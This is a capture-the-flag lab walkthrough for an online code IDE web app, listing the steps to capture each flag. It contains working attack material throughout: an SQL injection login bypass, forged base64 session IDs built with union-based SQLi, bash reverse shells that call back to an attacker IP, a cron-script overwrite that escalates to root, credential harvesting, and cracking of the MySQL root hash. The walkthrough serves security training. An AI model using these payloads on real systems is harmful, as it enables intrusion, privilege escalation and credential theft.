Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                

Walkthrough 2160

Download as pdf or txt
Download as pdf or txt
You are on page 1of 35

Name WebApp Security CTF: [Dec 11-15]

URL https://attackdefense.com/challengedetails?cid=2160

Type CTF Weekly: All

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

When the lab is launched, an Online Code IDE WebApp opens up in Firefox.

Step 1:​ Configure BurpSuite to intercept all the requests.

Launch BurpSuite:

Select Web Application Analysis > burpsuite from the application menu.
Once BurpSuite opens up, configure FoxyProxy to use Burp Suite profile:

Step 2:​ Login to the webapp using SQLi.

Use the following credentials to perform SQLi and login to the webapp:

Email:​ ' or '1'='1'#@test.com


Password:​ 123
Click on the login button and forward the intercepted requests:

Forward the above request.


Intercept the response to the above request:
Now, forward the above request and notice the intercepted response:

FLAG1:​ 2fb96bbc46ca18d07e0455acc706ea17

Notice that the response contains a SESSID (Session ID) parameter.

Session ID (sessid):
eyJhZG1pbiI6IDAsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIs
ICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9

It looks like the SESSID is base64-encoded.

Note:​ Do not forward the above response. It will be used in the next steps.

Step 3:​ Decoding the session ID.

Command:​ echo
eyJhZG1pbiI6IDAsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIs
ICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9 | base64 -d
FLAG2:​ fc235edfe919b80b4e87a7ef852f1f4f

The decoded session ID contains a flag.

Step 4:​ Forging the Session ID.

Notice that there is an admin attribute in the decoded session and it is set to 0.

Setting it to 1 and creating the forged Session ID:

Command:​ echo '{"admin": 1, "userid": 1, "email": "jackie@code-ide.com", "FLAG2":


"fc235edfe919b80b4e87a7ef852f1f4f"}' | base64 -w0

Forged Session ID:


eyJhZG1pbiI6IDEsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIs
ICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9Cg==
Modify the Session ID (sessid) in the response to the above intercepted request and forward it:
Notice that the webpage shows the logged in screen (SQLi was successful!) and there is a flag
in there as well (since the admin attribute in the Session ID was set to 1).

FLAG4:​ 7fa644c02146cd735a772199f6c9b050

Step 5:​ Run some code in the IDE.

Python Code:

print("Hello World!")

The response indicates that the Session ID is invalid!

It must be because the Session ID was tampered in the previous step (while setting the admin
attribute to 1).

Step 6:​ Logout of the webapp and login back using the same SQLi payload.
Click on the Logout button located on the top right of the webapp:

Login backing using the same SQLi payload as used before:

Username:​ ' or '1'='1'#@test.com


Password:​ 123

Step 7:​ Run some code in the IDE.

Python Code:

print("Hello World!")
Execute the above code.

Forward the above request.


Notice the Session ID in the above request:

Session ID:
eyJhZG1pbiI6IDAsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIs
ICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9

Step 8:​ Modify the admin attribute in Session ID.

Decode the Session ID retrieved from the above request and set the admin attribute to true
(anything other than 0 is considered as true) and encode it back:

Commands:
echo
eyJhZG1pbiI6IDAsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIs
ICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9 | base64 -d

echo '{"admin": 1, "userid": 1, "email": "jackie@code-ide.com", "FLAG2":


"fc235edfe919b80b4e87a7ef852f1f4f"}' | base64 -w0
Modified Session ID:
eyJhZG1pbiI6IDEsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIs
ICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9Cg==

Send the above request to repeater:


Modify the sessid in the request and place the one we created above (having admin attribute set
to 1):

Send the above request.


The response indicates that the Session ID was incorrect!

Step 9:​ Creating a forged Session ID with admin attribute set.

Since the backend is vulnerable to SQLi, trying Union-based SQLi payload to get the admin
attribute set (anything other than 0) by the backend:

Commands:
echo '{"admin": 1, "userid": 1, "email": "'"' union select 1,2,3" '#", "FLAG2":
"fc235edfe919b80b4e87a7ef852f1f4f"}'

echo '{"admin": 1, "userid": 1, "email": "'"' union select 1,2,3" '#", "FLAG2":
"fc235edfe919b80b4e87a7ef852f1f4f"}' | base64 -w0
Modified Session ID:
eyJhZG1pbiI6IDEsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiJyB1bmlvbiBzZWxlY3QgMSwyLDM
gIyIsICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9Cg==

Modify the Session ID in the request in the repeater:

The above Session ID didn’t work! It must be because the number of columns on the left and
right side of the union keyword must be different.

Modify the Union-based SQLi payload and increase the number of columns on the right side of
the union keyword:
Command:​ echo '{"admin": 1, "userid": 1, "email": "'"' union select 1,2,3,4" '#", "FLAG2":
"fc235edfe919b80b4e87a7ef852f1f4f"}' | base64 -w0

Modified Session ID:


eyJhZG1pbiI6IDEsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiJyB1bmlvbiBzZWxlY3QgMSwyLDM
sNCAjIiwgIkZMQUcyIjogImZjMjM1ZWRmZTkxOWI4MGI0ZTg3YTdlZjg1MmYxZjRmIn0K

Modify the Session ID in the request in the repeater:


This time, it worked! The Session ID was forged correctly!

There is a flag in the response headers:

FLAG3:​ 9448a9de8df7ef9473c3d82729bff89b

Note:​ Turn off the Intercept Mode in BurpSuite for all the future requests.
Notice the response in the webapp as well (after the interception is turned off in BurpSuite).

Step 10:​ Executing system commands on the target machine.

Python Code:

import os

os.system("ls -al")

The above code uses the ​system​ function from the ​os​ module to run the command: "ls -al"

Step 11:​ Obtaining a shell session of the target machine.

Check the IP address of the host machine (the Kali attacker machine):
Start a netcat listening:

Command:​ nc -lvp 54321

Now, paste the following code in the Code IDE:

Code:

import os

os.system("bash -c 'bash -i >& /dev/tcp/​192.183.31.2​/54321 0>&1'")

Note:​ Make sure to replace the IP address with the one you get in your lab instance.
Run the code and notice the terminal running the netcat listener:

A shell session is received back!

Step 12:​ Looking for the flags on the target machine.

Finding all the flag files:

Command:​ find / -name 'FLAG*' 2>/dev/null


FLAG6:​ c6d0b7e9cfd203a6db53a75f5f952b9c

Check the environment variables:

Command:​ printenv

FLAG5:​ 4787bf9ab0f4b5f60a19b577e4d1a486
Check the processes:

Command:​ ps aux

Notice that the cron service is running!

Step 13:​ Checking the cron jobs.

Command:​ cat /etc/crontab


Notice that the last entry (/cleanup.sh) looks interesting. It is run as root and gets executed
every minute!

Checking the contents of the cleanup script:

Command:​ cat /cleanup.sh

Notice that there is a flag in this script:


FLAG8:​ a6dd00deb2654213060bc0efc28e576e

This script cleans up files that are older than 1 minute and owned by the codebot user
(excluding the home directory files).

Checking the permissions of the cleanup script:

Command:​ ls -al /cleanup.sh

It is world-writable! This can be leveraged to gain a root shell on the target machine.

Step 14:​ Retrieving the root shell.

Modify the contents of the cleanup script to receive a shell session on the attacker machine:

Commands:
echo "bash -c 'bash -i >& /dev/tcp/192.183.31.2/8888 0>&1'" > /cleanup.sh
cat /cleanup.sh

On the attacker machine, start a netcat listener:

Command:​ nc -lvp 8888


Wait for a while and within 1 minute, the root shell session would be retrieved!

Command:​ nc -lvp 8888

Confirming that it is the root shell:

Command:​ whoami

The root shell session has been retrieved!

Step 15:​ Looking for the flags on the target machine.

Command:​ find / -name 'FLAG*' 2>/dev/null


One of the flags (FLAG6) has already been retrieved. Retrieving the other 2 flags:

Commands:
cat /home/admin/FLAG7
cat /root/FLAG10

FLAG7:​ 59b0dc3b11be41bd31e3e20823bc3a45
FLAG10:​ e8288b0cc0a442b58260b96f72609c9d

Checking the process listing:

Command:​ ps aux
Notice that mysql server is running on the target machine, as seen in the above output.

Note:​ To upgrade to a fully interactive shell, use the following commands:

Commands:
python -c "import pty;pty.spawn('/bin/bash')"
[Press CTRL + Z]
stty raw -echo
fg

Now, the shell session should be fully interactive!

Step 16:​ Look for MySQL credentials from the backend API code.
Commands:
ls
ls pythonAPI/
grep -r -C4 mysql pythonAPI/

Notice that the code (DBAPI.py) contains the credentials used to connect to the MySQL server:

Username:​ michael
Password:​ 5up3r_53cur3_p4ssw0rd

Step 17:​ Connecting to the MySQL server using the credentials retrieved in the previous step.

Command:​ mysql -umichael -p5up3r_53cur3_p4ssw0rd


Note:​ If the shell session was not upgraded, Python could be used to connect to the MySQL
server:

Step 18:​ Retrieving the flag from the database.

Commands:
show databases;
use secret_flag_9686d1f73c3
show tables;
select * from flag;
FLAG9:​ 1f63300548823105d976aeb86a2ccdfe

Step 19:​ Retrieving the authentication string for the MySQL root user.

Use the following SQL query to get the username, host and authentication string of all the users
in the mysql.user table:

SQL Query:​ select user,host,authentication_string from mysql.user;

authentication_string for MySQL root user:


*6B5EDDE567F4F29018862811195DBD14B8ADDD2A

Step 20:​ Cracking the authentication_string for MySQL root user.

Save the authentication_string for the root user to a file (on the attacker machine, that is, Kali
GUI) and crack it using John The Ripper:

Commands:
echo '*6B5EDDE567F4F29018862811195DBD14B8ADDD2A' > hash.txt
john hash.txt
FLAG11 (Password of MySQL root user):​ 1234567890

References:

1. OWASP Top 10 (​https://owasp.org/www-project-top-ten/​)


2. MySQL (​https://www.mysql.com/​)
3. John The Ripper (​https://www.openwall.com/john/​)

You might also like